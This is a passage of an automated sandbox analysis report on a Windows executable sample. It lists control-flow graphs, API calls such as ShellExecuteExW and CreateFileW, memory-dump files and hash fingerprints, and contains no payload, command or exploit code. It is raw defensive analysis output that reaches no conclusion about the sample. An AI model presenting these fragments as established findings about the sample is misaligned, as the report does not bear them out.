                          control_flow_graph 1991 7ff64d34f4e0-7ff64d34f523 1992 7ff64d34f529-7ff64d34f565 call 7ff64d353cf0 1991->1992 1993 7ff64d34f894-7ff64d34f8b9 call 7ff64d321fa0 call 7ff64d352320 1991->1993 1999 7ff64d34f56a-7ff64d34f571 1992->1999 2000 7ff64d34f567 1992->2000 2002 7ff64d34f582-7ff64d34f586 1999->2002 2003 7ff64d34f573-7ff64d34f577 1999->2003 2000->1999 2006 7ff64d34f58b-7ff64d34f596 2002->2006 2007 7ff64d34f588 2002->2007 2004 7ff64d34f57c-7ff64d34f580 2003->2004 2005 7ff64d34f579 2003->2005 2004->2006 2005->2004 2008 7ff64d34f59c 2006->2008 2009 7ff64d34f628 2006->2009 2007->2006 2010 7ff64d34f5a2-7ff64d34f5a9 2008->2010 2011 7ff64d34f62c-7ff64d34f62f 2009->2011 2012 7ff64d34f5ab 2010->2012 2013 7ff64d34f5ae-7ff64d34f5b3 2010->2013 2014 7ff64d34f637-7ff64d34f63a 2011->2014 2015 7ff64d34f631-7ff64d34f635 2011->2015 2012->2013 2016 7ff64d34f5e5-7ff64d34f5f0 2013->2016 2017 7ff64d34f5b5 2013->2017 2018 7ff64d34f660-7ff64d34f673 call 7ff64d3363ac 2014->2018 2019 7ff64d34f63c-7ff64d34f643 2014->2019 2015->2014 2015->2018 2023 7ff64d34f5f2 2016->2023 2024 7ff64d34f5f5-7ff64d34f5fa 2016->2024 2020 7ff64d34f5ca-7ff64d34f5d0 2017->2020 2036 7ff64d34f698-7ff64d34f6ed call 7ff64d35797c call 7ff64d32129c call 7ff64d3332a8 call 7ff64d321fa0 2018->2036 2037 7ff64d34f675-7ff64d34f693 call 7ff64d3413c4 2018->2037 2019->2018 2021 7ff64d34f645-7ff64d34f65c 2019->2021 2027 7ff64d34f5b7-7ff64d34f5be 2020->2027 2028 7ff64d34f5d2 2020->2028 2021->2018 2023->2024 2025 7ff64d34f8ba-7ff64d34f8c1 2024->2025 2026 7ff64d34f600-7ff64d34f607 2024->2026 2034 7ff64d34f8c6-7ff64d34f8cb 2025->2034 2035 7ff64d34f8c3 2025->2035 2030 7ff64d34f60c-7ff64d34f612 2026->2030 2031 7ff64d34f609 2026->2031 2032 7ff64d34f5c3-7ff64d34f5c8 2027->2032 2033 7ff64d34f5c0 2027->2033 2028->2016 2030->2025 2039 7ff64d34f618-7ff64d34f622 2030->2039 2031->2030 2032->2020 2040 7ff64d34f5d4-7ff64d34f5db 2032->2040 2033->2032 2041 7ff64d34f8cd-7ff64d34f8d4 2034->2041 2042 7ff64d34f8de-7ff64d34f8e6 2034->2042 2035->2034 2058 7ff64d34f742-7ff64d34f74f ShellExecuteExW 2036->2058 2059 7ff64d34f6ef-7ff64d34f73d call 7ff64d35797c call 7ff64d32129c call 7ff64d335b60 call 7ff64d321fa0 2036->2059 2037->2036 2039->2009 2039->2010 2045 7ff64d34f5dd 2040->2045 2046 7ff64d34f5e0 2040->2046 2047 7ff64d34f8d6 2041->2047 2048 7ff64d34f8d9 2041->2048 2049 7ff64d34f8eb-7ff64d34f8f6 2042->2049 2050 7ff64d34f8e8 2042->2050 2045->2046 2046->2016 2047->2048 2048->2042 2049->2011 2050->2049 2060 7ff64d34f846-7ff64d34f84e 2058->2060 2061 7ff64d34f755-7ff64d34f75f 2058->2061 2059->2058 2066 7ff64d34f882-7ff64d34f88f 2060->2066 2067 7ff64d34f850-7ff64d34f866 2060->2067 2063 7ff64d34f76f-7ff64d34f772 2061->2063 2064 7ff64d34f761-7ff64d34f764 2061->2064 2069 7ff64d34f774-7ff64d34f77f call 7ff64d38e188 2063->2069 2070 7ff64d34f78e-7ff64d34f7ad call 7ff64d38e1b8 call 7ff64d34fe24 2063->2070 2064->2063 2068 7ff64d34f766-7ff64d34f76d 2064->2068 2066->1993 2072 7ff64d34f87d call 7ff64d35220c 2067->2072 2073 7ff64d34f868-7ff64d34f87b 2067->2073 2068->2063 2076 7ff64d34f7e3-7ff64d34f7f0 CloseHandle 2068->2076 2069->2070 2090 7ff64d34f781-7ff64d34f78c ShowWindow 2069->2090 2070->2076 2098 7ff64d34f7af-7ff64d34f7b2 2070->2098 2072->2066 2073->2072 2074 7ff64d34f8fb-7ff64d34f903 call 7ff64d357904 2073->2074 2081 7ff64d34f7f2-7ff64d34f803 call 7ff64d3413c4 2076->2081 2082 7ff64d34f805-7ff64d34f80c 2076->2082 2081->2082 2088 7ff64d34f82e-7ff64d34f830 2081->2088 2082->2088 2089 7ff64d34f80e-7ff64d34f811 2082->2089 2088->2060 2096 7ff64d34f832-7ff64d34f835 2088->2096 2089->2088 2095 7ff64d34f813-7ff64d34f828 2089->2095 2090->2070 2095->2088 2096->2060 2100 7ff64d34f837-7ff64d34f845 ShowWindow 2096->2100 2098->2076 2101 7ff64d34f7b4-7ff64d34f7c5 GetExitCodeProcess 2098->2101 2100->2060 2101->2076 2102 7ff64d34f7c7-7ff64d34f7dc 2101->2102 2102->2076
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                          • String ID: .exe$.inf$Install$p
                          • API String ID: 1054546013-3607691742
                          • Opcode ID: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
                          • Instruction ID: 1f729023321e438578fa73509282745ae3cb12d7cdcc5a5c72a7728699a2dbcb
                          • Opcode Fuzzy Hash: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
                          • Instruction Fuzzy Hash: 7FC19062F1CA0295FB12FB65D95027DA7B1AF86B84F084032EA4DC7AA5FF3DE4558300

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                          • String ID:
                          • API String ID: 4119318379-0
                          • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                          • Instruction ID: 2b1803ee70117f262a27cecf44c7d0894409708b1488f5ca7aa9a2cc21a6ecf6
                          • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                          • Instruction Fuzzy Hash: 8A41F535F1874286F711FF61E810BAA63A0EB8AB88F441135ED0E97B94DF7EE4498740
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3668304517-0
                          • Opcode ID: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
                          • Instruction ID: aeddcb6522a81f8d25e34cc6ddabac77c5aefd0ad694d785650528215d789298
                          • Opcode Fuzzy Hash: 62b60af2f7a88576df12e3db194ad19acd1e3759869934ce613b8f4ca490e85a
                          • Instruction Fuzzy Hash: 3D12C062F0CB4185EB11FB65D4442EDA371AB467ACF500236EA5C97AD9EF3CE589C380

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3765 7ff64d3324c0-7ff64d3324fb 3766 7ff64d332506 3765->3766 3767 7ff64d3324fd-7ff64d332504 3765->3767 3768 7ff64d332509-7ff64d332578 3766->3768 3767->3766 3767->3768 3769 7ff64d33257d-7ff64d3325a8 CreateFileW 3768->3769 3770 7ff64d33257a 3768->3770 3771 7ff64d332688-7ff64d33268d 3769->3771 3772 7ff64d3325ae-7ff64d3325de GetLastError call 7ff64d336a0c 3769->3772 3770->3769 3773 7ff64d332693-7ff64d332697 3771->3773 3778 7ff64d33262c 3772->3778 3779 7ff64d3325e0-7ff64d33262a CreateFileW GetLastError 3772->3779 3776 7ff64d332699-7ff64d33269c 3773->3776 3777 7ff64d3326a5-7ff64d3326a9 3773->3777 3776->3777 3780 7ff64d33269e 3776->3780 3781 7ff64d3326ab-7ff64d3326af 3777->3781 3782 7ff64d3326cf-7ff64d3326e3 3777->3782 3785 7ff64d332632-7ff64d33263a 3778->3785 3779->3785 3780->3777 3781->3782 3786 7ff64d3326b1-7ff64d3326c9 SetFileTime 3781->3786 3783 7ff64d33270c-7ff64d332735 call 7ff64d352320 3782->3783 3784 7ff64d3326e5-7ff64d3326f0 3782->3784 3787 7ff64d332708 3784->3787 3788 7ff64d3326f2-7ff64d3326fa 3784->3788 3789 7ff64d33263c-7ff64d332653 3785->3789 3790 7ff64d332673-7ff64d332686 3785->3790 3786->3782 3787->3783 3792 7ff64d3326fc 3788->3792 3793 7ff64d3326ff-7ff64d332703 call 7ff64d3220b0 3788->3793 3794 7ff64d33266e call 7ff64d35220c 3789->3794 3795 7ff64d332655-7ff64d332668 3789->3795 3790->3773 3792->3793 3793->3787 3794->3790 3795->3794 3798 7ff64d332736-7ff64d33273b call 7ff64d357904 3795->3798
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 3536497005-0
                          • Opcode ID: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
                          • Instruction ID: a6db4c30d29a509256a2ec11e6f1fa8fc39c115f65c29cff4a099c900d7bdd7b
                          • Opcode Fuzzy Hash: dc46ff84bd0c57c9ac2b9914d0228e8f14f7433d989622a2074281460ea8d587
                          • Instruction Fuzzy Hash: 5961D366E1C74186E721EB29E50036EA7B1BB8A7A8F101334DFAD43AD8EF7DD0548744

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                          • String ID: ]
                          • API String ID: 2347093688-3352871620
                          • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                          • Instruction ID: dde25e3c37cd58948f2c3ad44cf5062b05473753e70c1cd28c1adca3831154e5
                          • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                          • Instruction Fuzzy Hash: 94118621F0D64242FA66FB22A654379D3D1AF8ABC1F080474DD5D87B95FF2EE8058B00

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: Message$DialogDispatchPeekTranslate
                          • String ID:
                          • API String ID: 1266772231-0
                          • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                          • Instruction ID: 51eb40356dfc1cab3200bb088c376030af62d74139c22229fca4b05603ea2b02
                          • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                          • Instruction Fuzzy Hash: D1F0EC25F3C55282FB51BB20E895A36A3A1BFD2B05F845431F54ED2854EF2DD508CB00

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                          • String ID: EDIT
                          • API String ID: 4243998846-3080729518
                          • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                          • Instruction ID: 47cfc7c45387346340ee6b3b41b322d8f6e0f3ac952ddc38675a669a5417256e
                          • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                          • Instruction Fuzzy Hash: 3F011D61F1CA4782FA22BB21E8207B6A390AF9B785F481035C94DC6655FE2DE549C750

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4075 7ff64d332ce0-7ff64d332d0a 4076 7ff64d332d0c-7ff64d332d0e 4075->4076 4077 7ff64d332d13-7ff64d332d1b 4075->4077 4078 7ff64d332ea9-7ff64d332ec4 call 7ff64d352320 4076->4078 4079 7ff64d332d1d-7ff64d332d28 GetStdHandle 4077->4079 4080 7ff64d332d2b 4077->4080 4079->4080 4082 7ff64d332d31-7ff64d332d3d 4080->4082 4084 7ff64d332d86-7ff64d332da2 WriteFile 4082->4084 4085 7ff64d332d3f-7ff64d332d44 4082->4085 4088 7ff64d332da6-7ff64d332da9 4084->4088 4086 7ff64d332d46-7ff64d332d7a WriteFile 4085->4086 4087 7ff64d332daf-7ff64d332db3 4085->4087 4086->4088 4091 7ff64d332d7c-7ff64d332d82 4086->4091 4089 7ff64d332db9-7ff64d332dbd 4087->4089 4090 7ff64d332ea2-7ff64d332ea6 4087->4090 4088->4087 4088->4090 4089->4090 4092 7ff64d332dc3-7ff64d332dd8 call 7ff64d32b4f8 4089->4092 4090->4078 4091->4086 4093 7ff64d332d84 4091->4093 4096 7ff64d332dda-7ff64d332de1 4092->4096 4097 7ff64d332e1e-7ff64d332e6d call 7ff64d35797c call 7ff64d32129c call 7ff64d32bca8 4092->4097 4093->4088 4096->4082 4098 7ff64d332de7-7ff64d332de9 4096->4098 4097->4090 4108 7ff64d332e6f-7ff64d332e86 4097->4108 4098->4082 4100 7ff64d332def-7ff64d332e19 4098->4100 4100->4082 4109 7ff64d332e88-7ff64d332e9b 4108->4109 4110 7ff64d332e9d call 7ff64d35220c 4108->4110 4109->4110 4111 7ff64d332ec5-7ff64d332ecb call 7ff64d357904 4109->4111 4110->4090
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: FileWrite$Handle
                          • String ID:
                          • API String ID: 4209713984-0
                          • Opcode ID: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
                          • Instruction ID: d43491741b409f37429e31ac545691bd6e2cf7cb8883a52dfa68226b2a716236
                          • Opcode Fuzzy Hash: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
                          • Instruction Fuzzy Hash: B4511366F1EA4292EA22FB25D94477AA360FF46B94F041131EA4D86AD4FF3CE485C300

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                          • String ID:
                          • API String ID: 3750147219-0
                          • Opcode ID: f6b19c5786641239495edb38a692ba8cfa3517dae24bead12263da06daead65f
                          • Instruction ID: c3fa6f5b805bff9fb7984f5bccd1e0f73bae7eec78f87c7c648b81b58d1a0988
                          • Opcode Fuzzy Hash: f6b19c5786641239495edb38a692ba8cfa3517dae24bead12263da06daead65f
                          • Instruction Fuzzy Hash: 1251D1A2F1C65284FF02BFA5D8542ADA362BF46BA4F400635DA2D97BD5EF6DD040C300
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                          • String ID:
                          • API String ID: 2359106489-0
                          • Opcode ID: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
                          • Instruction ID: 8a28c77b2c3094786badcc54e7b58b7625bb6b8e092b02281fafe2f29341b8a8
                          • Opcode Fuzzy Hash: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
                          • Instruction Fuzzy Hash: 2731C662E0C68241EE62BB25A64427DE361FF8A7A0F548231EE9DC3BD5EF3CD4458600
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 1452418845-0
                          • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                          • Instruction ID: f57888eb1a3b3f75d389b37e7306c531d8dab6717466279956c842b06e4224bb
                          • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                          • Instruction Fuzzy Hash: 5C311A25E0D10341FA67FB65D4713BAA391AF47788F485434EA4ECB2D3FE2CA804C251
                          APIs
                          • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360B91
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360BF3
                          • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360C2D
                          • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF64D35C45B), ref: 00007FF64D360C57
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$Free
                          • String ID:
                          • API String ID: 1557788787-0
                          • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                          • Instruction ID: e079e63d4cb1b19619b3c99f621be9a49bab8d75e9ccda76d5a6a9f2848f52c5
                          • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                          • Instruction Fuzzy Hash: 78213E21F1CB9181E675BF12A44102DE6A4FB9ABD0B485134DE9EA7BE4EF3CE4528704
                          APIs
                          Memory Dump Source
                          • Source File: 0000000B.00000002.1824081640.00007FF64D321000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF64D320000, based on PE: true
                          • Associated: 0000000B.00000002.1824016227.00007FF64D320000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824154201.00007FF64D368000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D37B000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824189932.00007FF64D384000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38A000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 0000000B.00000002.1824324602.00007FF64D38E000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_7ff64d320000_572stuOQ0pZG2Xj.jbxd
                          Similarity
                          • API ID: ErrorLast$FileHandleRead
                          • String ID:
                          • API String ID: 2244327787-0
                          • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                          • Instruction ID: 874b801092155f2ec19d4f80623a166ace4aee2dc669e1ee2ddd37987a907b73
                          • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
